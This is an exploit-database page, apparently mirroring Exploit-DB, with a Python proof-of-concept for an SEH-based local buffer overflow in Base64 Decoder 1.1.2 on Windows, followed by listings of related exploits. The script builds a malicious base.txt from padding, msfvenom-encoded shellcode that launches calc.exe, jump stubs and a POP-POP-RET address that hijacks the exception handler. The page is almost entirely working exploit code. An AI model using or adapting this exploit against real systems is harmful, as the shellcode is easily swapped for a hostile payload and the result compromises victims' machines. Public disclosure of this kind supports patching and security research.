Search for hundreds of thousands of exploits

"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)"

Author

Exploit author

bzyo

Platform

Exploit platform

windows

Release date

Exploit published date

2018-12-20

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#!/usr/bin/env python

# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)
# Date: 12-20-18
# Vulnerable Software: Base64 Decoder 1.1.2
# Vendor Homepage: http://4mhz.de/b64dec.html
# Version: 1.1.2
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. copy/paste base.txt contents into 'save to file' section of app
# 3. select decode
# 4. pop calc

# orig dos poc from UN_NON, EDB: 39070

import struct

junk3 = "\x41" * 90

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")

junk2 = "\xcc"*50

#jump to calc
jmp3 = "\xe9\xaf\xfd\xff\xff\xcc"

junk1 = "\xcc"*20

#jump to jmp3
jmp2 = "\xeb\xe4\xcc\xcc\xcc\xcc"

#jump to jmp2
jmp1 = "\xeb\xf8\xcc\xcc"

#0x0045241e : pop esi # pop ebx # ret
seh = struct.pack('<L',0x0045241e)

buffer = junk3 + calc + junk2 + jmp3 + junk1 + jmp2 + jmp1 + seh
    
with open("base.txt","wb") as f:
    f.write(buffer[:-1])
Release DateTitleTypePlatformAuthor
2020-07-09"FrootVPN 4.8 - 'frootvpn' Unquoted Service Path"localwindowsv3n0m
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-26"KiteService 1.2020.618.0 - Unquoted Service Path"localwindows"Marcos Antonio LeΓ³n"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
2020-06-23"Code Blocks 20.03 - Denial Of Service (PoC)"doswindows"Paras Bhatia"
2020-06-23"Lansweeper 7.2 - Incorrect Access Control"localwindows"Amel BOUZIANE-LEBLOND"
2020-06-22"Frigate 2.02 - Denial Of Service (PoC)"doswindows"Paras Bhatia"
2020-06-17"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-16"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path"localwindowsboku
Release DateTitleTypePlatformAuthor
2020-04-20"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)"localwindowsbzyo
2019-05-17"Iperius Backup 6.1.0 - Privilege Escalation"localwindowsbzyo
2019-05-06"NSClient++ 0.5.2.35 - Privilege Escalation"localwindowsbzyo
2019-02-14"exacqVision ESM 5.12.2 - Privilege Escalation"localwindowsbzyo
2019-01-30"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-28"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-11"Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)"localwindowsbzyo
2019-01-10"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2018-12-27"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"Iperius Backup 5.8.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-20"LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)"localwindows_x86bzyo
2018-12-20"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)"localwindowsbzyo
2018-12-11"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion"webappsmultiplebzyo
2018-09-12"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)"webappswindowsbzyo
2018-09-12"SynaMan 4.0 build 1488 - SMTP Credential Disclosure"webappswindowsbzyo
2018-08-06"AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Privilege Escalation"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)"localwindowsbzyo
2018-05-06"HWiNFO 5.82-3410 - Denial of Service"doswindowsbzyo
2018-04-24"RGui 3.4.4 - Local Buffer Overflow"localwindowsbzyo
2018-04-18"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities"webappsxmlbzyo
2018-04-17"Reaper 5.78 - Local Buffer Overflow"localwindowsbzyo
2018-04-09"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)"localwindowsbzyo
2018-04-02"WebLog Expert Enterprise 9.4 - Privilege Escalation"localwindowsbzyo
2018-03-26"LabF nfsAxe 3.7 - Privilege Escalation"localwindowsbzyo
2018-03-23"WM Recorder 16.8.1 - Denial of Service"doswindowsbzyo
2018-03-05"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow"localwindowsbzyo
2018-03-02"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)"localwindowsbzyo
2018-03-02"IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)"localwindowsbzyo
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46021/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.